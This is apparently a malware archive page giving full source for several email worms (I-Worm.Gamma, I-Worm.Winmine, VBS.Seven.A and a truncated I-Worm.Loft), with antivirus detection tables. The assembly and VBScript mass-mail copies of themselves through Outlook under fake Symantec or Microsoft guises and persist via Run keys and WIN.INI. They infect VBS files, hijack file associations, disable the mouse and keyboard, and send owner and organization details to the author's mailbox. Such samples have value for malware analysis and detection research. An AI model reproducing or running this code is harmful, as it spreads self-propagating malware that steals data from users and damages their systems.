information File size: 31232 bytes MD5...: 84a74bcf024ac4779d20e2b667bc6da6 SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33 comment # Name : I-Worm.Gamma (w32gammaworm) Author : PetiK Date : May 29th - June 9th Size : 8704 bytes
Action : Check if the file is /WINDOWS/SYSTEM.SETUP.EXE. Whether it's not this file, it will copies to /WINDOWS/SYSTEM.SETUP.EXE. It alters the run= line in the Win.ini file to the name of the copy. It displays a message. Otherwise, he create C:\gamma and copies it to C:\mirc, C:\mirc32, C:\progra~1\mirc or C:\progra~1\mirc32. After, it creates C:\Data and put a file info.vbs. This file send a message to [email protected] :
Subject : Message from + Name of the registered user Body : Time, Date, Organization I-Worm.Gamma
On the 5th, when the day is Wednesday, a message is displayed. When the user click on "OK", the worm swap the buttons of the mouse.
The worms waits for an active Internet connection and tries to establish one by attemping to www.symantec.com. When the connection is successful, it scans all *.*htm* file in "Temporary Inetrnet Files" to find email adresses. When the worms finds it, it sends a copy of him to the address :
From : snd @symantec.com Date : 06/06/2001 Subject : Virus/Worms Fix from Symantec Corporation (Norton Antivirus) Body : Hi, Symantec Corporation send you the last version of our tool Virus/Worms Fix. Here is the version 3.1 . This tool detect, repair and protect users against Bloodhound.IRC.Worm, Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .
With Regards, Symantec Corporation (http://www.symantec.com) Attachment : SETUP.EXE #
.586p .model flat,stdcall include useful.inc extrn CloseHandle:PROC extrn CopyFileA:PROC extrn CreateDirectoryA:PROC extrn CreateFileA:PROC extrn CreateFileMappingA:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn FindClose:PROC extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn gethostbyname:PROC extrn GetFileSize:PROC extrn GetModuleFileNameA:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetSystemTime:PROC extrn GetWindowsDirectoryA:PROC extrn lstrcat:PROC extrn lstrcmp:PROC extrn MAPILogoff:PROC extrn MAPILogon:PROC extrn MAPISendMail:PROC extrn MapViewOfFile:PROC extrn MessageBoxA:PROC extrn RegCloseKey:PROC extrn RegOpenKeyExA:PROC extrn RegQueryValueExA:PROC extrn SetCurrentDirectoryA:PROC extrn Sleep:PROC extrn SwapMouseButton:PROC extrn UnmapViewOfFile:PROC extrn WinExec:PROC extrn WriteFile:PROC extrn WritePrivateProfileStringA:PROC
.data szComName db 50 dup (0) szOrig db 50 dup (0) szWinini db 50 dup (0) szTif db 7Fh dup (0)
FileHandle dd ? RegHandle dd ? SrchHandle dd ? octets dd ? ValueType dd 0 mail_address db 128 dup (?) MAPISession dd 0
DIR db "C:\Data",00h information db "C:\Data\info.vbs",00h infoexec db "wscript C:\Data\info.vbs",00h mirc db "C:\gamma",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\progra~1\mirc\script.ini",00h script4 db "C:\progra~1\mirc32\script.ini",00h Copie db "\SETUP.EXE",00h Winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h TEXTE db "This file does not appear to be a Win32 valid file. ",00h TITRE2 db "I-Worm.Gamma (c)2001",00h TEXTE2 db "PetiK greets you",00h symantec db "www.symantec.com",00h tempnetfile db "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",00h Value db "Cache",00h FICHIER db "*.*htm*",00h CREATE_NEW equ 00000001h CREATE_ALWAYS equ 00000002h FILE_ATTRIBUTE_READONLY equ 00000001h FILE_ATTRIBUTE_NORMAL equ 00000080h FILE_MAP_READ equ 00000004h FILE_SHARE_READ equ 00000001h GENERIC_READ equ 80000000h GENERIC_WRITE equ 40000000h HKEY_USERS equ 80000003h KEY_QUERY_VALUE equ 00000001h KEY_SET_VALUE equ 00000002h MAX_PATH equ 260 OPEN_EXISTING equ 00000003h PAGE_READONLY equ 00000002h REG_SZ equ 00000001h
SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends SystemTime SYSTIME <> time struc LowDateTime dd ? HighDateTime dd ? time ends win32 struc FileAttributes dd ? CreationTime time ? LastAccessTime time ? LastWriteTime time ? FileSizeHifh dd ? FileSizeLow dd ? Reserved0 dd ? Reserved1 dd ? FileName dd MAX_PATH (?) AlternativeFileName db 13 dup (?) db 3 dup (?) win32 ends CHERCHE win32 <> mircd: db "[script]",0dh,0ah db ";Don't delete this file",0dh,0ah db "n0=ON 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",0dh,0ah MIRCTAILLE equ $-mircd infod: db ''' Symantec ScriptBlocking Authenticated File',0dh,0ah db ''' A3C7B6E0-5535-11D5-911D-444553546170',0dh,0ah db '',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'set w=CreateObject("WScript.Shell")',0dh,0ah db 'If w.RegRead("HKLM\Software\Gamma\") <> "OK" Then',0dh,0ah db 'set o=CreateObject("Outlook.Application")',0dh,0ah db 'set m=o.CreateItem(0)',0dh,0ah db 'n=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")',0dh,0ah db 'p=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")',0d h,0ah db 'm.To = "[email protected]"',0dh,0ah db 'm.Subject = "Message from " & n',0dh,0ah db 's = "Time : " & time',0dh,0ah db 's = s & vbCrLf & "Date : " & date',0dh,0ah db 's = s & vbCrLf & "Organization : " & p',0dh,0ah db 's = s & vbCrLf & vbCrLf & " I-Worm.Gamma"',0dh,0ah db 'm.Body = s',0dh,0ah db 'm.DeleteAfterSubmit=True',0dh,0ah db 'm.Send',0dh,0ah db 'w.RegWrite "HKLM\Software\Gamma\", "OK"',0dh,0ah db 'End If',0dh,0ah INFOTAILLE equ $-infod
Email dd ? dd offset Subject dd offset Message dd ? dd offset DateS dd ? dd 2 dd offset MelFrom dd 1 dd offset MelTo dd 1 dd offset Attach MelFrom dd ? dd ? dd offset MelFrom dd offset sAddr dd ? dd ?
MelTo dd ? dd 1 dd offset MelTo dd offset mail_address dd ? dd ?
Attach dd ? dd ? dd ? dd offset szOrig dd ? dd ? Subject db "Virus/Worms Fix from Symantec Corporation (Norton Antivirus)",00h Message db "Hi,",0dh,0ah,0dh,0ah db "Symantec Corporation send you the last version of our tool Virus/Worms Fix. " db "Here is the version 3.1 .",0dh,0ah db "This tool detect, repair and protect users against Bloodhound.IRC.Worm, " db "Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .",0dh,0ah,0dh,0ah db 09h,09h,"With Regards,",0dh,0ah db 09h,09h,"Symantec Corporation (http://www.symantec.com)",00h DateS db "06/06/2001",00h sAddr db "[email protected]",00h
.code DEBUT: VERIF: push 00h call GetModuleHandleA push 50 push offset szOrig push eax call GetModuleFileNameA
push 50h push offset szCopie call GetSystemDirectoryA push offset Copie push offset szCopie call lstrcat
push offset szOrig push offset szCopie call lstrcmp test eax,eax jz MIRC
COPIE: push 00h push offset szCopie push offset szOrig call CopyFileA
WININI: push 50 push offset szWinini call GetWindowsDirectoryA push offset Winini push offset szWinini call lstrcat push offset szWinini push offset szCopie push offset run push offset windows call WritePrivateProfileStringA
MESSAGE:push 1010h push offset szOrig push offset TEXTE push 00h call MessageBoxA jmp FIN
MIRC: push 00h push FILE_ATTRIBUTE_READONLY push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset mirc call CreateFileA mov [FileHandle],eax push 00h push offset octets push MIRCTAILLE push offset mircd push [FileHandle] call WriteFile push [FileHandle] call CloseHandle C_MIRC: push 00h push offset script1 push offset mirc call CopyFileA push 00h push offset script2 push offset mirc call CopyFileA push 00h push offset script3 push offset mirc call CopyFileA push 00h push offset script4 push offset mirc call CopyFileA INFO: push offset DIR call CreateDirectoryA push 00h push FILE_ATTRIBUTE_NORMAL push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset information call CreateFileA cmp eax,-1 je DATE mov [FileHandle],eax push 00h push offset octets push INFOTAILLE push offset infod push [FileHandle] call WriteFile push [FileHandle] call CloseHandle push 01h push offset infoexec call WinExec
DATE: push offset SystemTime call GetSystemTime cmp [SystemTime.wDayOfWeek],03h jne NET cmp [SystemTime.wDay],05h jne NET push 40h push offset TITRE2 push offset TEXTE2 push 00h call MessageBoxA push 01h call SwapMouseButton jmp NET
PAUSE: push 60 * 3 * 1000 call Sleep
NET: push offset symantec call gethostbyname test eax,eax jz PAUSE TIF: push offset RegHandle push KEY_QUERY_VALUE push 00h push offset tempnetfile push HKEY_USERS call RegOpenKeyExA test eax,eax jnz FIN push 7Fh push offset szTif push offset ValueType push 00h push offset Value push [RegHandle] call RegQueryValueExA
push [RegHandle] call RegCloseKey
TIFCH: push offset szTif call SetCurrentDirectoryA
FFF: push offset CHERCHE push offset FICHIER call FindFirstFileA cmp eax,-1 je FC mov [SrchHandle],eax cHTML: call HTML FNF: push offset CHERCHE push [SrchHandle] call FindNextFileA dec eax jnz cHTML FC: push [SrchHandle] call FindClose
END_S: popad
FIN: push 00h call ExitProcess
HTML: pushad push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_READ push offset CHERCHE.FileName call CreateFileA inc eax je END_S dec eax xchg eax,ebx xor eax,eax push eax push eax push eax push PAGE_READONLY push eax push ebx call CreateFileMappingA test eax,eax jz FERME1
xor eax,eax push eax push eax push eax push FILE_MAP_READ push ebp call MapViewOfFile test eax,eax jz FERME2 xchg eax,esi
push 00h push ebx call GetFileSize xchg eax,ecx jecxz FERME3 ls_s_m: call @mt db 'mailto:' @mt: pop edi l_s_m: pushad push 07h pop ecx rep cmpsb popad je s_m inc esi loop l_s_m
FERME3: push esi call UnmapViewOfFile FERME2: push ebp call CloseHandle FERME1: push ebx call CloseHandle popad ret s_m: xor edx,edx add esi,7 mov edi,offset mail_address push edi n_c: lodsb cmp al,' ' je s_c cmp al,'"' je e_c cmp al,'''' je e_c cmp al,'@' jne o_a inc edx o_a: stosb jmp n_c s_c: inc esi jmp n_c e_c: xor al,al stosb pop edi test edx,edx je ls_s_m mapiln: xor eax,eax push dword ptr [MAPISession] push eax push eax push eax ; password push eax ; username push eax call MAPILogon mapism: xor eax,eax push eax push eax push offset Email push eax push word ptr [MAPISession] call MAPISendMail mapilf: xor eax,eax push eax push eax push eax push dword ptr [MAPISession] call MAPILogoff
jmp ls_s_m
end DEBUT File Gamma.exe received on 05.16.2009 11:58:18 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.8704 AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.09 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.15 W32/Malware!d62f Avast 4.8.1335.0 2009.05.15 Win32:Gamma AVG 8.5.0.336 2009.05.15 I-Worm/Petik BitDefender 7.2 2009.05.16 Win32.Petik.C@mm CAT-QuickHeal 10.00 2009.05.15 - ClamAV 0.94.1 2009.05.15 Worm.Petik.AV.09 Comodo 1157 2009.05.08 Worm.Win32.Petik.C DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704 eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 Win32/Mania F-Prot 4.4.4.56 2009.05.15 W32/Malware!d62f F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 W32/PetTick.D@mm GData 19 2009.05.16 Win32.Petik.C@mm Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 W32/PetTick@MM McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.09 Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.C@mm NOD32 4080 2009.05.15 Win32/Petik.C Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.A nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.16 DDoS/Petik.C PCTools 4.4.2.0 2009.05.15 I-Worm.Gamma.A Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.g Sophos 4.41.0 2009.05.16 W32/Gamma Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v) Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.D VBA32 3.12.10.5 2009.05.16 OScope.Dialer.GMHA ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.A VirusBuster 4.6.5.0 2009.05.15 I-Worm.Gamma.A Additional information File size: 8704 bytes MD5...: 997ae169da2f57e7e48e6862eb70223a SHA1..: b7349d6e5c65551d1162597cf4871b0c8e04e6b1 comment # Name : I-Worm.Winmine Author : PetiK Date : June 12th - June 15th Size : 6656 bytes
Action : Check if the file is run from the SYSTEM folder. If so, it creates a file with the name "C:\ENVOIE_VBS.vbs" to spread with Outlook : Subject : Is the work so hard ?? Body : Relax you with the last version of
Otherwise, it copies itself to SYSTEM folder, alters the load= line in WIN.INI file to run when the computer starts and displays a message box. #
.586p .model flat .code callx macro a extrn a:proc call a endm DEBUT: VERIF: push 00h callx GetModuleHandleA push 50 push offset szOrig push eax callx GetModuleFileNameA
push 50h push offset szCopie callx GetSystemDirectoryA push offset Copie push offset szCopie callx lstrcat push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz SEND COPIE: push 00h push offset szCopie push offset szOrig callx CopyFileA
WININI: push 50 push offset szWinini callx GetWindowsDirectoryA push offset Winini push offset szWinini callx lstrcat push offset szWinini push offset szCopie push offset load push offset windows callx WritePrivateProfileStringA
MESSAGE:push 1040h push offset TITRE push offset TEXTE push 00h callx MessageBoxA jmp FIN SEND: push 00h push FILE_ATTRIBUTE_READONLY push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset vbssend callx CreateFileA cmp eax,-1 je GO mov [FileHandle],eax push 00h push offset octets push VBSTAILLE push offset vbsd push [FileHandle] callx WriteFile push [FileHandle] callx CloseHandle GO: push 01h push offset onyva callx WinExec
DLL: push offset dllName callx LoadLibraryA test eax,eax jz DATE mov hdll,eax push offset FunctionName push hdll callx GetProcAddress test eax,eax jz DATE mov setvalue,eax REG: push 08h push offset start_page push 01h push offset start_key push offset main_s push HKEY_CURRENT_USER call [setvalue] FINDLL: push [hdll] callx FreeLibrary
DATE: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDay],0Fh jne FIN push 40h push offset TITRE2 push offset TEXTE2 push 00h callx MessageBoxA push 01h callx SwapMouseButton push 60 * 5 * 1000 callx Sleep push EWX_SHUTDOWN callx ExitWindowsEx
FIN: push 00h callx ExitProcess
.data szCopie db 50 dup (0) szOrig db 50 dup (0) szWinini db 50 dup (0) FileHandle dd ? octets dd ? hdll dd ? setvalue dd ?
Copie db "\WINMINE.EXE",00h vbssend db "C:\ENVOIE_VBS.vbs",00h onyva db "wscript C:\ENVOIE_VBS.vbs",00h Winini db "\\WIN.INI",00h load db "load",00h windows db "windows",00h TITRE db "Winmine - Microsoft Corporation (R)",00h TEXTE db "The last update of the game ""Winmine"" written by Microsoft Corporation",00h TITRE2 db "I-Worm.Winmine",00h TEXTE2 db "By PetiK (c)2001",00h main_s db "Software\Microsoft\Internet Explorer\Main",00h start_key db "Start Page",00h start_page db "http://perso.libertysurf.fr/dacruz/mayaindex.html",00h dllName db "SHLWAPI.dll",00h FunctionName db "SHSetValueA",00h wormname db "I-Worm.Winmine by PetiK",00h vbsd: db 'On Error Resume Next',0dh,0ah db 'Set A=CreateObject("Outlook.Application")',0dh,0ah db 'Set B=A.GetNameSpace("MAPI")',0dh,0ah db 'For Each C In B.AddressLists',0dh,0ah db 'If C.AddressEntries.Count <> 0 Then',0dh,0ah db 'For D=1 To C.AddressEntries.count',0dh,0ah db 'Set E=C.AddressEntries(D)',0dh,0ah db 'Set F=A.CreateItem(0)',0dh,0ah db 'F.To=E.Address',0dh,0ah db 'F.Subject="Is the work so hard ??"',0dh,0ah db 'F.Body="Relax you with the last version of
CREATE_NEW equ 00000001h FILE_ATTRIBUTE_READONLY equ 00000001h FILE_SHARE_READ equ 00000001h GENERIC_WRITE equ 40000000h HKEY_CURRENT_USER equ 80000001h EWX_SHUTDOWN equ 00000001h
SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wSecond WORD ? wMillisecond WORD ? SYSTIME ends SystemTime SYSTIME <> end DEBUT end File Winmine.exe received on 05.10.2009 23:52:01 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.10 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.09 Win32/Petik.worm.6656 AntiVir 7.9.0.166 2009.05.10 Worm/Petik.AV.02 Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.10 W32/Malware!cc55 Avast 4.8.1335.0 2009.05.10 Win32:Petik-Winmine AVG 8.5.0.327 2009.05.10 I-Worm/Petik BitDefender 7.2 2009.05.10 Generic.Malware.Msp!.4B5A9B45 CAT-QuickHeal 10.00 2009.05.09 - ClamAV 0.94.1 2009.05.10 - Comodo 1157 2009.05.08 Worm.Win32.Petik.B DrWeb 5.0.0.12182 2009.05.10 Win32.Petik.6656 eSafe 7.0.17.0 2009.05.10 - eTrust-Vet 31.6.6497 2009.05.08 Win32/Petik.6656.C F-Prot 4.4.4.56 2009.05.10 W32/Malware!cc55 F-Secure 8.0.14470.0 2009.05.09 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.10 W32/Petik!worm GData 19 2009.05.10 Generic.Malware.Msp!.4B5A9B45 Ikarus T3.1.1.49.0 2009.05.10 Email-Worm.Win32.Petik K7AntiVirus 7.10.729 2009.05.08 Email-Worm.Win32.Petik Kaspersky 7.0.0.125 2009.05.10 Email-Worm.Win32.Petik McAfee 5611 2009.05.10 W32/PetTick@MM McAfee+Artemis 5611 2009.05.10 - McAfee-GW-Edition 6.7.6 2009.05.10 Worm.Petik.AV.02 Microsoft 1.4602 2009.05.10 Worm:Win32/Pet_tik.G@mm NOD32 4063 2009.05.08 Win32/Petik.B Norman 6.01.05 2009.05.08 W32/Pet_Tick.6656.C nProtect 2009.1.8.0 2009.05.10 Worm/W32.Petik.6656 Panda 10.0.0.14 2009.05.10 W32/Petik PCTools 4.4.2.0 2009.05.07 I-Worm.Petik.H Prevx 3.0 2009.05.10 Medium Risk Malware Rising 21.28.62.00 2009.05.10 Trojan.WINMINE Sophos 4.41.0 2009.05.10 W32/Winmine Sunbelt 3.2.1858.2 2009.05.09 BehavesLike.Win32.Malware (v) Symantec 1.4.4.12 2009.05.10 - TheHacker 6.3.4.1.324 2009.05.09 W32/PetTick@MM TrendMicro 8.950.0.1092 2009.05.08 WORM_MINEUP.A VBA32 3.12.10.4 2009.05.09 Win32.Worm.Petik.8192 ViRobot 2009.5.9.1727 2009.05.09 - VirusBuster 4.6.5.0 2009.05.10 I-Worm.Petik.H Additional information File size: 6656 bytes MD5...: 23f6db768eacfa01a352a657acb26c9b SHA1..: bc83ebddddead5521afeefd9e9df47e342f05153 ' Name : VBS.Seven.A ' Author : PetiK ' Date : June 16th 2001 ' Size : 3626 byte ' Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs, ' and \WINDOWS\TEMP\Lust.vbs. It adds values in Run key (Envy) and in ' Runservices key (Lust). When the current day is 1st, 15th or 30th it adds ' value in Run key of HKCU (Anger=rundll32 mouse,disable). That disable ' the mouse in each start. When the current day is 12th or 28th it displays a ' message box. It closes Windows when the user click on “OK”. ' When the day is 14th it shows an other message it displays a message. ' When the user click on “OK”, the worm disables the keyboard. ' when the day is 5th or 17th, it changes some values in regedit. When the ' user want open a TXT file, “\WINDOWS\Seven.vbs” starts. The VBS icon is ' replaced by the TXT icon. ' It infects after all VBS files that it founds on the disk and adds some ' at the end of the file to run \WINDOWS\Seven.vbs when the file is ran. ' The worm ues Outlook to spread too : ' Subject : What is the seven sins ?? ' Body : Look at this file and learn them. ' Attached : Seven.vbs
'VBS.Seven.A On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2)
SEVEN() Sub SEVEN() Set org=fso.GetFile(WScript.ScriptFullname) org.Copy(win&"\Seven.vbs") org.Copy(sys&"\Envy.vbs") org.Copy(tmp&"\Lust.vbs") run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy") runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust") ws.RegWrite run,sys&"\Envy.vbs" ws.RegWrite runs,tmp&"\Lust.vbs" First() Second() Third() Disk() Send() End Sub
Sub First() If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger") ws.RegWrite run2,"rundll32 mouse,disable" End If End Sub
Sub Second() If Day(Now)=12 or Day(Now)=28 Then MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven" ws.Run "rundll32.exe user.exe,exitwindows" End If If Day(Now)=14 Then MsgBox "The keyboard is on strike !",vbInformation,"Seven" ws.Run "rundll32 keyboard,disable" End If End Sub
Sub Third() If Day(Now)=5 or Day(Now)=17 Then bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Sh ell Folders\Desktop") if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then txt=ws.RegRead("HKCR\txtfile\shell\open\command\") ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs" icot=ws.RegRead("HKCR\txtfile\DefaultIcon\") icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\") ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs") copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A""" copy.Close Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs") copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK (c)2001"",vbcritical,""VBS.Seven.A""" copy.Close end if End If End Sub
Sub Disk Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") end If Next End Sub Sub infect(dossier) Set f=fso.GetFolder(dossier) Set fc=f.Files For each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) If (ext="vbs") Then Set cot=fso.OpenTextFile(f1.path, 1, False) If cot.ReadLine <> "'VBS.Seven.A" then cot.Close Set cot=fso.OpenTextFile(f1.path, 1, False) vbsorg=cot.ReadAll() cot.Close Set inf=fso.OpenTextFile(f1.path,2,True) inf.WriteLine "'VBS.Seven.A" inf.Write(vbsorg) inf.WriteLine "" inf.WriteLine "Set w=CreateObject(""WScript.Shell"")" inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")" inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs""" inf.Close End If End If Next End Sub Sub list(dossier) Set f=fso.GetFolder(dossier) Set sf=f.SubFolders For each f1 in sf infect(f1.path) list(f1.path) Next End Sub
Sub Send() Set A=CreateObject("Outlook.Application") Set B=A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.count Set E=C.AddressEntries(D) Set F=A.CreateItem(0) F.To=E.Address F.Subject="What is the seven sins ??" F.Body="Look at this file and learn them." Set G=CreateObject("Scripting.FileSystemObject") F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs") F.DeleteAfterSubmit=True If F.To <> "" Then F.Send End If Next End If Next End Sub File Seven.vbs received on 05.16.2009 19:29:21 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik AntiVir 7.9.0.168 2009.05.15 Worm/Petik.I Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik Authentium 5.1.2.4 2009.05.16 VBS/Petik.S@mm Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen AVG 8.5.0.336 2009.05.15 I-Worm/Petik BitDefender 7.2 2009.05.16 Generic.ScriptWorm.9CAAED1A CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.I ClamAV 0.94.1 2009.05.16 Worm.Petik.I Comodo 1157 2009.05.08 Unclassified Malware DrWeb 5.0.0.12182 2009.05.16 VBS.Petik eSafe 7.0.17.0 2009.05.14 VBS.SillyWorm. eTrust-Vet 31.6.6508 2009.05.16 VBS/Chism F-Prot 4.4.4.56 2009.05.16 VBS/Petik.S@mm F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.i Fortinet 3.117.0.0 2009.05.16 VBS/Petik.I GData 19 2009.05.16 Generic.ScriptWorm.9CAAED1A Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.737 2009.05.16 - Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.i McAfee 5616 2009.05.15 VBS/Chism McAfee+Artemis 5616 2009.05.15 VBS/Chism McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.I Microsoft 1.4602 2009.05.16 Virus:VBS/Chism NOD32 4080 2009.05.15 VBS/Chism Norman 6.01.05 2009.05.16 VBS/Chism.A@mm nProtect 2009.1.8.0 2009.05.16 VBS.Petik.I@mm Panda 10.0.0.14 2009.05.16 VBS/Petik.I PCTools 4.4.2.0 2009.05.16 VBS.Seven.A Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 VBS.Petik.i Sophos 4.41.0 2009.05.16 VBS/Seven-A Sunbelt 3.2.1858.2 2009.05.16 - Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.I-O VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.i ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.16 VBS.Seven.A Additional information File size: 3626 bytes MD5...: 8781b9a791c0c144e97a466486f6ef33 SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec comment # Name : I-Worm.Loft Author : PetiK Date : June 16th - June 22nd Size : 8704 byte
Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies to this file and alters the run= line in the WIN.INI file to run in each start. It copies to \WINDOWS\LOFT_STORY.EXE too
Otherwise, it checks if exists the key HKCU\Software\Microsoft\PetiK. If not exists, the worm creates the file "Loft.htm" in the StartUp folder. When the user will accept the ActiveX of this page, It modifies the start page of Internet Explorer to download the file ActiveX.vbs. This file send differents information about the computer to three addresses : loftptk@multimania(castaldi), [email protected](vlad14) and [email protected](pk29a).
It displays a message all the 28th of the month and modifies the start page of internet and RegisteredOwner and RegisteredOrganization. It check if exist a internet connection. If not exist, it makes a loop all the five seconds or else it displays a message. It scans after all *.htm* file in the "Temporary Internet Files" to find email address. #
.586p .model flat .code callx macro a extrn a:proc call a endm include useful.inc DEBUT: VERIF: push 00h callx GetModuleHandleA push 50 push offset szOrig push eax callx GetModuleFileNameA
push 50h push offset szCopie callx GetSystemDirectoryA @pushsz "\LOFT.EXE" push offset szCopie callx lstrcat push 50h push offset szCopieb callx GetWindowsDirectoryA @pushsz "\LOFT_STORY.EXE" push offset szCopieb callx lstrcat
push offset szOrig push offset szCopie callx lstrcmp test eax,eax jz C_PTK
COPIE: push 00h push offset szCopie push offset szOrig callx CopyFileA push 00h push offset szCopieb push offset szOrig callx CopyFileA
WININI: push 50 push offset szWinini callx GetWindowsDirectoryA @pushsz "\\WIN.INI" push offset szWinini callx lstrcat push offset szWinini push offset szCopie @pushsz "run" @pushsz "windows" callx WritePrivateProfileStringA
MESSAGE:push 1040h @pushsz "Loft Story" @pushsz "I'm fucking the Loft Story" push 00h callx MessageBoxA jmp FIN
C_PTK: push offset regDisp push offset regResu push 00h push 0F003Fh push 00h push 00h push 00h @pushsz "Software\Microsoft\PetiK" push HKEY_CURRENT_USER callx RegCreateKeyExA cmp [regDisp],2 je DATE push [regResu] callx RegCloseKey
STA_UP: push offset RegHandle push 001F0000h ; KEY_QUERY_VALUE push 00h @pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" push HKEY_USERS callx RegOpenKeyExA test eax,eax jnz FIN
push offset BufferSize push offset Buffer push 00h ;ValueType push 00h @pushsz "Startup" push RegHandle callx RegQueryValueExA
push [RegHandle] callx RegCloseKey
